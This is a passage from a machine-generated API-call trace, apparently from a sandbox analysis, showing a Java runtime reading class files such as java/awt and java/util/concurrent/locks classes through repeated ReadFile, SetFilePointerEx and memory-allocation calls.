hTemplateFile=0x0) returned 0x32c [0128.084] free (_Block=0x12ed4440) [0128.085] ReadFile (in: hFile=0x32c, lpBuffer=0x208be30, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208be00, lpOverlapped=0x0 | out: lpBuffer=0x208be30*, lpNumberOfBytesRead=0x208be00*=0x95, lpOverlapped=0x0) returned 1 [0128.086] ReadFile (in: hFile=0x32c, lpBuffer=0x208be30, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208be00, lpOverlapped=0x0 | out: lpBuffer=0x208be30*, lpNumberOfBytesRead=0x208be00*=0x0, lpOverlapped=0x0) returned 1 [0128.087] CloseHandle (hObject=0x32c) returned 1 [0128.091] strlen (_Str="java/awt/Insets.class") returned 0x15 [0128.091] malloc (_Size=0x48) returned 0x12e5ee80 [0128.091] malloc (_Size=0xa0) returned 0x12dac650 [0128.091] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414242, lpNewFilePointer=0x208e3d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3d0*=54608450) returned 1 [0128.091] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e3a0, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208e3a0*=0xa0, lpOverlapped=0x0) returned 1 [0128.091] malloc (_Size=0x16) returned 0x12f4e480 [0128.092] free (_Block=0x12dac650) [0128.092] strlen (_Str="java/awt/Insets.class") returned 0x15 [0128.092] strcpy (in: _Dest=0x208e550, _Source="java/awt/Insets.class" | out: _Dest="java/awt/Insets.class") returned="java/awt/Insets.class" [0128.092] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301bc8f, lpNewFilePointer=0x208dfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfd0*=50445455) returned 1 [0128.092] ReadFile (in: hFile=0x134, lpBuffer=0x208e020, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dfa0, lpOverlapped=0x0 | out: lpBuffer=0x208e020*, lpNumberOfBytesRead=0x208dfa0*=0x1e, lpOverlapped=0x0) returned 1 [0128.094] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301bcc2, lpNewFilePointer=0x208e030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e030*=50445506) returned 1 [0128.094] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x606, lpNumberOfBytesRead=0x208e000, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208e000*=0x606, lpOverlapped=0x0) returned 1 [0128.095] free (_Block=0x12ddab00) [0128.095] free (_Block=0x12e5f420) [0128.137] strlen (_Str="java/awt/Toolkit$2.class") returned 0x18 [0128.137] malloc (_Size=0x48) returned 0x12e600f0 [0128.137] malloc (_Size=0xa0) returned 0x12dab940 [0128.137] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410626, lpNewFilePointer=0x208e690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e690*=54593062) returned 1 [0128.137] ReadFile (in: hFile=0x134, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e660, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208e660*=0xa0, lpOverlapped=0x0) returned 1 [0128.140] malloc (_Size=0x19) returned 0x12dda650 [0128.141] free (_Block=0x12dab940) [0128.141] strlen (_Str="java/awt/Toolkit$2.class") returned 0x18 [0128.142] strcpy (in: _Dest=0x208e810, _Source="java/awt/Toolkit$2.class" | out: _Dest="java/awt/Toolkit$2.class") returned="java/awt/Toolkit$2.class" [0128.142] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f88210, lpNewFilePointer=0x208e290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e290*=49840656) returned 1 [0128.142] ReadFile (in: hFile=0x134, lpBuffer=0x208e2e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e260, lpOverlapped=0x0 | out: lpBuffer=0x208e2e0*, lpNumberOfBytesRead=0x208e260*=0x1e, lpOverlapped=0x0) returned 1 [0128.145] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f88246, lpNewFilePointer=0x208e2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2f0*=49840710) returned 1 [0128.145] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x6d3, lpNumberOfBytesRead=0x208e2c0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208e2c0*=0x6d3, lpOverlapped=0x0) returned 1 [0128.146] free (_Block=0x12f4e480) [0128.146] free (_Block=0x12e5ee80) [0128.153] strlen (_Str="sun/awt/windows/WToolkit") returned 0x18 [0128.153] strlen (_Str="sun/awt/windows/WToolkit.class") returned 0x1e [0128.153] malloc (_Size=0x48) returned 0x12e5f1f0 [0128.154] malloc (_Size=0xa0) returned 0x12dab890 [0128.154] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412835, lpNewFilePointer=0x208df40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df40*=54601781) returned 1 [0128.154] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208df10, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208df10*=0xa0, lpOverlapped=0x0) returned 1 [0128.154] malloc (_Size=0x1f) returned 0x12ddb0a0 [0128.155] free (_Block=0x12dab890) [0128.155] strlen (_Str="sun/awt/windows/WToolkit.class") returned 0x1e [0128.155] strcpy (in: _Dest=0x208e0c0, _Source="sun/awt/windows/WToolkit.class" | out: _Dest="sun/awt/windows/WToolkit.class") returned="sun/awt/windows/WToolkit.class" [0128.155] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc86f3, lpNewFilePointer=0x208db40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db40*=50104051) returned 1 [0128.155] ReadFile (in: hFile=0x134, lpBuffer=0x208db90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208db10, lpOverlapped=0x0 | out: lpBuffer=0x208db90*, lpNumberOfBytesRead=0x208db10*=0x1e, lpOverlapped=0x0) returned 1 [0128.157] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc872f, lpNewFilePointer=0x208dba0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dba0*=50104111) returned 1 [0128.157] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x5ab0, lpNumberOfBytesRead=0x208db70, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208db70*=0x5ab0, lpOverlapped=0x0) returned 1 [0128.158] free (_Block=0x12dda650) [0128.158] free (_Block=0x12e600f0) [0128.168] malloc (_Size=0x48) returned 0x12e5ffb0 [0128.168] malloc (_Size=0xa0) returned 0x12dabe10 [0128.168] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413329, lpNewFilePointer=0x208d500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d500*=54604585) returned 1 [0128.169] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d4d0, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208d4d0*=0xa0, lpOverlapped=0x0) returned 1 [0128.169] malloc (_Size=0x19) returned 0x12ddab30 [0128.169] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe8c07, lpNewFilePointer=0x208d100, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d100*=50236423) returned 1 [0128.169] ReadFile (in: hFile=0x134, lpBuffer=0x208d150, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d0d0, lpOverlapped=0x0 | out: lpBuffer=0x208d150*, lpNumberOfBytesRead=0x208d0d0*=0x1e, lpOverlapped=0x0) returned 1 [0128.170] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe8c3d, lpNewFilePointer=0x208d160, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d160*=50236477) returned 1 [0128.170] ReadFile (in: hFile=0x134, lpBuffer=0x1226e140, nNumberOfBytesToRead=0x7ef7, lpNumberOfBytesRead=0x208d130, lpOverlapped=0x0 | out: lpBuffer=0x1226e140*, lpNumberOfBytesRead=0x208d130*=0x7ef7, lpOverlapped=0x0) returned 1 [0128.173] malloc (_Size=0x48) returned 0x12e5ee80 [0128.173] malloc (_Size=0xa0) returned 0x12dab520 [0128.173] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34132d9, lpNewFilePointer=0x208ca40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca40*=54604505) returned 1 [0128.173] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca10, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208ca10*=0xa0, lpOverlapped=0x0) returned 1 [0128.173] malloc (_Size=0x23) returned 0x12dda8f0 [0128.173] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe8ae8, lpNewFilePointer=0x208c640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c640*=50236136) returned 1 [0128.173] ReadFile (in: hFile=0x134, lpBuffer=0x208c690, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c610, lpOverlapped=0x0 | out: lpBuffer=0x208c690*, lpNumberOfBytesRead=0x208c610*=0x1e, lpOverlapped=0x0) returned 1 [0128.173] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe8b28, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=50236200) returned 1 [0128.173] ReadFile (in: hFile=0x134, lpBuffer=0x13039f30, nNumberOfBytesToRead=0xdf, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: lpBuffer=0x13039f30*, lpNumberOfBytesRead=0x208c670*=0xdf, lpOverlapped=0x0) returned 1 [0128.174] malloc (_Size=0x48) returned 0x12e5f880 [0128.174] malloc (_Size=0xa0) returned 0x12dac860 [0128.174] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413288, lpNewFilePointer=0x208ca40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca40*=54604424) returned 1 [0128.174] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca10, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208ca10*=0xa0, lpOverlapped=0x0) returned 1 [0128.175] malloc (_Size=0x24) returned 0x12dda980 [0128.175] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe89da, lpNewFilePointer=0x208c640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c640*=50235866) returned 1 [0128.175] ReadFile (in: hFile=0x134, lpBuffer=0x208c690, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c610, lpOverlapped=0x0 | out: lpBuffer=0x208c690*, lpNumberOfBytesRead=0x208c610*=0x1e, lpOverlapped=0x0) returned 1 [0128.175] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe8a1b, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=50235931) returned 1 [0128.175] ReadFile (in: hFile=0x134, lpBuffer=0x13039f30, nNumberOfBytesToRead=0xcd, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: lpBuffer=0x13039f30*, lpNumberOfBytesRead=0x208c670*=0xcd, lpOverlapped=0x0) returned 1 [0128.176] malloc (_Size=0x48) returned 0x12e5ede0 [0128.176] malloc (_Size=0xa0) returned 0x12daace0 [0128.176] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341323c, lpNewFilePointer=0x208ca40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca40*=54604348) returned 1 [0128.176] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca10, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208ca10*=0xa0, lpOverlapped=0x0) returned 1 [0128.176] malloc (_Size=0x1f) returned 0x12ddb0a0 [0128.177] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe80c2, lpNewFilePointer=0x208c640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c640*=50233538) returned 1 [0128.177] ReadFile (in: hFile=0x134, lpBuffer=0x208c690, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c610, lpOverlapped=0x0 | out: lpBuffer=0x208c690*, lpNumberOfBytesRead=0x208c610*=0x1e, lpOverlapped=0x0) returned 1 [0128.177] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe80fe, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=50233598) returned 1 [0128.177] ReadFile (in: hFile=0x134, lpBuffer=0x13039f20, nNumberOfBytesToRead=0x8dc, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: lpBuffer=0x13039f20*, lpNumberOfBytesRead=0x208c670*=0x8dc, lpOverlapped=0x0) returned 1 [0128.178] malloc (_Size=0x48) returned 0x12e5ff60 [0128.178] malloc (_Size=0xa0) returned 0x12dabc00 [0128.178] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34131ee, lpNewFilePointer=0x208ca40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca40*=54604270) returned 1 [0128.178] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca10, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208ca10*=0xa0, lpOverlapped=0x0) returned 1 [0128.178] malloc (_Size=0x21) returned 0x12ddab00 [0128.178] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe7ede, lpNewFilePointer=0x208c640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c640*=50233054) returned 1 [0128.178] ReadFile (in: hFile=0x134, lpBuffer=0x208c690, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c610, lpOverlapped=0x0 | out: lpBuffer=0x208c690*, lpNumberOfBytesRead=0x208c610*=0x1e, lpOverlapped=0x0) returned 1 [0128.179] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe7f1c, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=50233116) returned 1 [0128.179] ReadFile (in: hFile=0x134, lpBuffer=0x13039f30, nNumberOfBytesToRead=0x1a6, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: lpBuffer=0x13039f30*, lpNumberOfBytesRead=0x208c670*=0x1a6, lpOverlapped=0x0) returned 1 [0128.179] malloc (_Size=0x48) returned 0x12e60000 [0128.180] malloc (_Size=0xa0) returned 0x12dac440 [0128.180] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413192, lpNewFilePointer=0x208ca40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca40*=54604178) returned 1 [0128.180] ReadFile (in: hFile=0x134, lpBuffer=0x12dac440, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca10, lpOverlapped=0x0 | out: lpBuffer=0x12dac440*, lpNumberOfBytesRead=0x208ca10*=0xa0, lpOverlapped=0x0) returned 1 [0128.180] malloc (_Size=0x2f) returned 0x12ef4cd0 [0128.180] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe7de3, lpNewFilePointer=0x208c640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c640*=50232803) returned 1 [0128.180] ReadFile (in: hFile=0x134, lpBuffer=0x208c690, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c610, lpOverlapped=0x0 | out: lpBuffer=0x208c690*, lpNumberOfBytesRead=0x208c610*=0x1e, lpOverlapped=0x0) returned 1 [0128.180] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe7e2f, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=50232879) returned 1 [0128.180] ReadFile (in: hFile=0x134, lpBuffer=0x13039f40, nNumberOfBytesToRead=0xaf, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: lpBuffer=0x13039f40*, lpNumberOfBytesRead=0x208c670*=0xaf, lpOverlapped=0x0) returned 1 [0128.190] strlen (_Str="java/util/concurrent/locks/ReentrantLock$NonfairSync.class") returned 0x3a [0128.190] malloc (_Size=0x48) returned 0x12e600a0 [0128.190] malloc (_Size=0xa0) returned 0x12daace0 [0128.190] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341312a, lpNewFilePointer=0x208d000, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d000*=54604074) returned 1 [0128.190] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cfd0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208cfd0*=0xa0, lpOverlapped=0x0) returned 1 [0128.190] malloc (_Size=0x3b) returned 0x12e5eed0 [0128.191] strlen (_Str="java/util/concurrent/locks/ReentrantLock$NonfairSync.class") returned 0x3a [0128.191] strcpy (in: _Dest=0x208d180, _Source="java/util/concurrent/locks/ReentrantLock$NonfairSync.class" | out: _Dest="java/util/concurrent/locks/ReentrantLock$NonfairSync.class") returned="java/util/concurrent/locks/ReentrantLock$NonfairSync.class" [0128.191] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe7ab2, lpNewFilePointer=0x208cc00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc00*=50231986) returned 1 [0128.191] ReadFile (in: hFile=0x134, lpBuffer=0x208cc50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cbd0, lpOverlapped=0x0 | out: lpBuffer=0x208cc50*, lpNumberOfBytesRead=0x208cbd0*=0x1e, lpOverlapped=0x0) returned 1 [0128.191] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe7b0a, lpNewFilePointer=0x208cc60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc60*=50232074) returned 1 [0128.191] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2d9, lpNumberOfBytesRead=0x208cc30, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cc30*=0x2d9, lpOverlapped=0x0) returned 1 [0128.192] free (_Block=0x12ef4cd0) [0128.193] free (_Block=0x12e60000) [0128.195] strlen (_Str="java/util/concurrent/locks/ReentrantLock$Sync.class") returned 0x33 [0128.195] malloc (_Size=0x48) returned 0x12e600f0 [0128.195] malloc (_Size=0xa0) returned 0x12daace0 [0128.195] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34130c9, lpNewFilePointer=0x208c5c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5c0*=54603977) returned 1 [0128.195] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c590, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c590*=0xa0, lpOverlapped=0x0) returned 1 [0128.195] malloc (_Size=0x34) returned 0x12ef4c90 [0128.196] strlen (_Str="java/util/concurrent/locks/ReentrantLock$Sync.class") returned 0x33 [0128.196] strcpy (in: _Dest=0x208c740, _Source="java/util/concurrent/locks/ReentrantLock$Sync.class" | out: _Dest="java/util/concurrent/locks/ReentrantLock$Sync.class") returned="java/util/concurrent/locks/ReentrantLock$Sync.class" [0128.196] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe733c, lpNewFilePointer=0x208c1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1c0*=50230076) returned 1 [0128.196] ReadFile (in: hFile=0x134, lpBuffer=0x208c210, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c190, lpOverlapped=0x0 | out: lpBuffer=0x208c210*, lpNumberOfBytesRead=0x208c190*=0x1e, lpOverlapped=0x0) returned 1 [0128.196] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe738d, lpNewFilePointer=0x208c220, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c220*=50230157) returned 1 [0128.196] ReadFile (in: hFile=0x134, lpBuffer=0x1227a920, nNumberOfBytesToRead=0x725, lpNumberOfBytesRead=0x208c1f0, lpOverlapped=0x0 | out: lpBuffer=0x1227a920*, lpNumberOfBytesRead=0x208c1f0*=0x725, lpOverlapped=0x0) returned 1 [0128.197] free (_Block=0x12e5eed0) [0128.197] free (_Block=0x12e600a0) [0128.200] strlen (_Str="java/util/concurrent/locks/AbstractQueuedSynchronizer.class") returned 0x3b [0128.200] malloc (_Size=0x48) returned 0x12e5f600 [0128.200] malloc (_Size=0xa0) returned 0x12dac650 [0128.200] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413060, lpNewFilePointer=0x208bb80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb80*=54603872) returned 1 [0128.200] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bb50, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208bb50*=0xa0, lpOverlapped=0x0) returned 1 [0128.201] malloc (_Size=0x3c) returned 0x12e5fb00 [0128.201] strlen (_Str="java/util/concurrent/locks/AbstractQueuedSynchronizer.class") returned 0x3b [0128.201] strcpy (in: _Dest=0x208bd00, _Source="java/util/concurrent/locks/AbstractQueuedSynchronizer.class" | out: _Dest="java/util/concurrent/locks/AbstractQueuedSynchronizer.class") returned="java/util/concurrent/locks/AbstractQueuedSynchronizer.class" [0128.201] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe484e, lpNewFilePointer=0x208b780, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b780*=50219086) returned 1 [0128.201] ReadFile (in: hFile=0x134, lpBuffer=0x208b7d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b750, lpOverlapped=0x0 | out: lpBuffer=0x208b7d0*, lpNumberOfBytesRead=0x208b750*=0x1e, lpOverlapped=0x0) returned 1 [0128.202] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe48a7, lpNewFilePointer=0x208b7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7e0*=50219175) returned 1 [0128.202] ReadFile (in: hFile=0x134, lpBuffer=0x1227b240, nNumberOfBytesToRead=0x2a95, lpNumberOfBytesRead=0x208b7b0, lpOverlapped=0x0 | out: lpBuffer=0x1227b240*, lpNumberOfBytesRead=0x208b7b0*=0x2a95, lpOverlapped=0x0) returned 1 [0128.203] free (_Block=0x12ef4c90) [0128.203] free (_Block=0x12e600f0) [0128.216] strlen (_Str="java/util/concurrent/locks/AbstractOwnableSynchronizer.class") returned 0x3c [0128.217] malloc (_Size=0x48) returned 0x12e5eed0 [0128.217] malloc (_Size=0xa0) returned 0x12daace0 [0128.217] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412ff6, lpNewFilePointer=0x208b140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b140*=54603766) returned 1 [0128.217] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b110, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208b110*=0xa0, lpOverlapped=0x0) returned 1 [0128.217] malloc (_Size=0x3d) returned 0x12e5ef20 [0128.217] strlen (_Str="java/util/concurrent/locks/AbstractOwnableSynchronizer.class") returned 0x3c [0128.217] strcpy (in: _Dest=0x208b2c0, _Source="java/util/concurrent/locks/AbstractOwnableSynchronizer.class" | out: _Dest="java/util/concurrent/locks/AbstractOwnableSynchronizer.class") returned="java/util/concurrent/locks/AbstractOwnableSynchronizer.class" [0128.217] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe460f, lpNewFilePointer=0x208ad40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ad40*=50218511) returned 1 [0128.218] ReadFile (in: hFile=0x134, lpBuffer=0x208ad90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ad10, lpOverlapped=0x0 | out: lpBuffer=0x208ad90*, lpNumberOfBytesRead=0x208ad10*=0x1e, lpOverlapped=0x0) returned 1 [0128.218] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe4669, lpNewFilePointer=0x208ada0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ada0*=50218601) returned 1 [0128.218] ReadFile (in: hFile=0x134, lpBuffer=0x1227ded0, nNumberOfBytesToRead=0x1e5, lpNumberOfBytesRead=0x208ad70, lpOverlapped=0x0 | out: lpBuffer=0x1227ded0*, lpNumberOfBytesRead=0x208ad70*=0x1e5, lpOverlapped=0x0) returned 1 [0128.218] free (_Block=0x12e5fb00) [0128.218] free (_Block=0x12e5f600) [0128.223] malloc (_Size=0x48) returned 0x12e5f9c0 [0128.223] malloc (_Size=0xa0) returned 0x12daaef0 [0128.223] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412f88, lpNewFilePointer=0x208cb40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb40*=54603656) returned 1 [0128.223] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cb10, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208cb10*=0xa0, lpOverlapped=0x0) returned 1 [0128.223] malloc (_Size=0x41) returned 0x12e5f060 [0128.224] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe40e8, lpNewFilePointer=0x208c740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c740*=50217192) returned 1 [0128.224] ReadFile (in: hFile=0x134, lpBuffer=0x208c790, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c710, lpOverlapped=0x0 | out: lpBuffer=0x208c790*, lpNumberOfBytesRead=0x208c710*=0x1e, lpOverlapped=0x0) returned 1 [0128.224] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe4146, lpNewFilePointer=0x208c7a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7a0*=50217286) returned 1 [0128.224] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x4c9, lpNumberOfBytesRead=0x208c770, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c770*=0x4c9, lpOverlapped=0x0) returned 1 [0128.232] strlen (_Str="java/util/concurrent/locks/AbstractQueuedSynchronizer$ConditionObject.class") returned 0x4b [0128.232] malloc (_Size=0x48) returned 0x12e5f330 [0128.232] malloc (_Size=0xa0) returned 0x12dab9f0 [0128.232] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412f0f, lpNewFilePointer=0x208cfc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cfc0*=54603535) returned 1 [0128.232] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cf90, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208cf90*=0xa0, lpOverlapped=0x0) returned 1 [0128.232] malloc (_Size=0x4c) returned 0x12ee9080 [0128.233] strlen (_Str="java/util/concurrent/locks/AbstractQueuedSynchronizer$ConditionObject.class") returned 0x4b [0128.233] strcpy (in: _Dest=0x208d140, _Source="java/util/concurrent/locks/AbstractQueuedSynchronizer$ConditionObject.class" | out: _Dest="java/util/concurrent/locks/AbstractQueuedSynchronizer$ConditionObject.class") returned="java/util/concurrent/locks/AbstractQueuedSynchronizer$ConditionObject.class" [0128.233] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe2e20, lpNewFilePointer=0x208cbc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbc0*=50212384) returned 1 [0128.233] ReadFile (in: hFile=0x134, lpBuffer=0x208cc10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cb90, lpOverlapped=0x0 | out: lpBuffer=0x208cc10*, lpNumberOfBytesRead=0x208cb90*=0x1e, lpOverlapped=0x0) returned 1 [0128.270] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe2e89, lpNewFilePointer=0x208cc20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc20*=50212489) returned 1 [0128.270] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x125f, lpNumberOfBytesRead=0x208cbf0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cbf0*=0x125f, lpOverlapped=0x0) returned 1 [0128.271] free (_Block=0x12e5f060) [0128.272] free (_Block=0x12e5f9c0) [0128.273] strlen (_Str="java/util/concurrent/locks/Condition.class") returned 0x2a [0128.273] malloc 